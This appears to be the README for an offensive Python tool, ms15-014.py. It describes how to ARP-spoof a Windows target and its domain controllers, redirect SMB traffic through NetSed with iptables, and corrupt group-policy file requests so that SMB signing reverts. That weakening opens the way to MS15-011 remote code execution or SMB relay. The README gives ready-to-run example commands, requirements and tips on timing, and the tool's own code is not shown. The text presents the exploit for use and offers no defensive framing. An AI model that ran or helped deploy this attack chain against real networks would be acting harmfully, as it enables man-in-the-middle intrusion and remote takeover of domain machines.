On a vulnerable version of Windows that is joined to a domain if part of the GPO update fails the group policy settings will revert to default settings and have a value of "Not Defined". This has multiple security impacts, two high-value concerns are:
- SMB Signing for SMB servers is OFF by default, except for DC's.
- SMB Signing for the network client is OFF by default. This allows exploitation of MS15-014.
For a in-depth explanation of the vulnerabilities and exploit scenarios refer to the F-Secure and ADSecurity links below in the References section.
Successful exploitation of MS15-014 will allow for MS15-011 to be exploited which could allow remote code execution. By default Windows machines have SMB Signing for the network client as OFF, meaning MS15-014 won't be needed to exploit a system vulnerable to MS15-011 unless SMB Signing for the network client has been enabled.
Additionally, MS15-014 can be used to disable SMB signing of the targets SMB server, then targetted in a relay attacks.
By default, GPO updates occur every 90 minutes plus a random amount of time between 0 and 30 minutes. This means exploitation could take up to 120 minutes (2 hours) with default settings. Depending on the environment it is possible updates have modified to update more frequently, it is also possible updates may occur much less frequently. This exploit will ArpSpoof a target and the domain controller(s). It will use iptables to forward all traffic on 445 to 446 where NetSed listens. It will then look at SMB traffic for the mention of the file "\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf" and corrupt any of these packets. This will cause the GPO update to fail, and successfully exploit the vulnerability.
During testing I reliably observed after 4 corrupt packets exploitation was successful. Sometimes the packet capture showed up to 7 packets containing requests for this file, however exploitation was successful after only 4 corruptions. For this reason the script will indicate it is likely completed after 4, but continue waiting until 7 packets are corrupted. If the corrupted count remains the same for 2-3 minutes, it is safe to assume the GPO update has completed, unless you note a extremely slow network.
The maximum GPO update time is 31 days with a maximum additional random time of 24 hours. If a sysadmin has configured for the maximum limits MS15-014 and then MS15-011 in theory could take up to 62 days to exploit. Have fun waiting for that shell!
Example command where 172.66.10.2 is the vulnerable target machine and 172.66.10.10 is the DC. Multiple DC's are supported
python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
Multiple DC's:
python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
Note See Requirements below. This script makes changes to iptables PREROUTING NAT table and enables IP_forwarding. Make sure to revert settings after exploitation.
- ArpSpoof
- iptables
- NetSed
- Python3 and w/e libraries are imported.
- This script does not work if Kerberos is required, exploitation is possible but I wouldn't be scripting that. The F-Secure link below mentions the steps required for exploitation if Kerberos is in use, it requires additional effort to exploit including password cracking of kerberos tickets, or knowledge of user passwords.
- If you want to target multiple hosts you can either modify the script or run additional ArpSpoof commands.
- Revert changes to iptables before exploiting MS15-014 or you might end up waiting an additional 31 days :P
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-011